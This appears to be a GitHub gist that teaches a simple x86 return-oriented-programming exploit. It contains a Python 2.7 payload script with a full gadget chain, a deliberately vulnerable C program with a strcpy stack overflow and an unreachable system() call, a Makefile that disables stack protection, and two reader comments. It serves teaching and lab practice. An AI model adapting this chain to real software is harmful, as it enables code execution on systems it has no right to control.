Simple ROP Exploit Example (x86)
# NOTE: For Python 2.7
# Under 2.7 a "str" is a byte string, so the output of struct.pack() can be
# appended to the "A"*... filler directly; on Python 3 this would need b"A"
# and a bytes payload throughout.
import os
import struct
# Find gadgets.
# All five addresses come from `objdump -d` of one particular simple-rop
# build (the 0x0804xxxx range is the classic non-PIE i386 load address).
# They are valid only for that exact binary: rebuilding with different
# source, compiler or flags moves them -- which is also why position-
# independent code is an effective mitigation against hard-coded chains.
pop_ret = 0x08049ca5 # start address of a pop,ret sequence
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence (one byte before pop_ret)
lazy = 0x08049b05 # objdump -d | grep lazy
food = 0x08049b30 # objdump -d | grep food
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick
# Buffer Overflow
# vuln() copies argv[1] into a 100-byte stack buffer with strcpy(); the 0x6c
# (108) bytes of filler presumably cover the buffer plus frame padding up to
# the saved EBP -- the offset is taken as given here, not recomputed. "BBBB"
# overwrites the saved EBP; the next 4 bytes land on vuln()'s return address.
payload = "A"*0x6c
payload += "BBBB"
# food(0xdeadbeef) gadget: vuln() "returns" into food(). food() then sees
# pop_ret where its own return address belongs and 0xdeadbeef where its
# first cdecl argument belongs; when food() returns, pop_ret discards that
# argument slot and the following ret continues with the next entry.
# "I" is a native-endian unsigned 32-bit value (little-endian on x86).
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
# feeling_sick(0xd15ea5e, 0x0badf00d) gadget: same shape with two
# arguments, so a pop,pop,ret clears both before returning into lazy(),
# which hands the assembled global string to system().
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
# os.system() routes this through /bin/sh, so the payload must contain no
# NUL byte (argv cannot carry one) and no byte that is special inside
# double quotes (", $, `, \). The values above satisfy that; re-check if
# any address changes. A subprocess argv list would bypass the shell.
os.system("./simple-rop \"%s\"" % payload)
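# Builds the deliberately vulnerable 32-bit target for the ROP example.
# Recipe lines must be tab-indented (they were flattened on the page).
# The flags are what make the exercise work, and are the opposite of what a
# real build should use: -m32 gives 4-byte stack slots, -O0 keeps the frame
# layout literal, -static yields a self-contained image (the 0x0804xxxx
# addresses in the payload show it is non-PIE, i.e. fixed code addresses),
# and -fno-stack-protector removes the canary that would abort on overflow.
simple-rop: simple-rop.c
	gcc -m32 -O0 -g -static -fno-stack-protector $^ -o $@

.PHONY: clean
clean:
	rm -f simple-rop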
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// Global scratch buffer: food() and feeling_sick() strcat() onto it and
// lazy() passes it to system(). main() resets only string[0]. One append of
// each fragment fits (roughly 66 characters plus the terminator), but the
// strcat calls are unbounded if they run more than once.
char string[100];
// I might need this later. ¯\_(ツ)_/¯
// I'm not using it so it shouldn't affect anything.
// Review note: nothing in this file calls lazy(), yet it is still compiled
// into the binary at a fixed address and hands the global `string` to
// system(). Code that is unreachable by design but wraps a dangerous call is
// not dead -- it remains a valid jump target. Remove it, or let the linker
// drop it (-ffunction-sections -Wl,--gc-sections), rather than assuming
// "unused" means "harmless".
void lazy() {
    system(string);
}
// Appends "/bin" to the global string, but only when called with the magic
// value 0xdeadbeef. `magic` is an int while 0xdeadbeef is an unsigned int
// constant, so the comparison is done unsigned and the 32-bit bit pattern
// matches even though it is negative as an int.
void food(int magic) {
    printf("THANK YOU!\n");
    if (magic == 0xdeadbeef) {
        strcat(string, "/bin");
    }
}
// Appends an "/echo '...'" fragment to the global string when both magic
// values match. Together with food()'s "/bin" this yields a complete
// command line for lazy()'s system() call; neither function checks how
// much room is left in the 100-byte global.
void feeling_sick(int magic1, int magic2) {
    printf("1m f33ling s1cK...\n");
    if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) {
        strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'");
    }
}
// Copies the caller-supplied string into a fixed 100-byte stack buffer with
// strcpy(), which never checks length: this is the deliberate overflow the
// exercise is built around. Input of 100 or more characters overwrites
// whatever the compiler placed above `buffer` in the frame. The parameter
// `string` also shadows the global `string` declared above; it is the
// argument, not the global, that is copied here. In any real program the
// fix is a bounded copy (strncpy/snprintf with sizeof buffer and explicit
// NUL termination) plus an input-length check at the call site.
void vuln(char *string) {
    char buffer[100] = {0};
    strcpy(buffer, string); // I don't know any better.
}
// Entry point: empties the global string, prints the banner and passes
// argv[1] straight to vuln(). There is no length check on argv[1] anywhere
// between the command line and strcpy().
int main(int argc, char** argv) {
    string[0] = 0;
    printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n");
    if (argc > 1) {
        vuln(argv[1]);
    } else {
        printf("y0u f0rG0T t0 f33d mE!!!\n");
    }
    return 0;
}
@EralpCelebi

Should I just set pop_ret to the start of the overflow, like the first appearance of "BBBB", or after it?

@mayanez

mayanez commented Apr 19, 2019

You should set pop_ret to the address of the pop,ret instruction sequence in the program's code, not to a position in the payload.
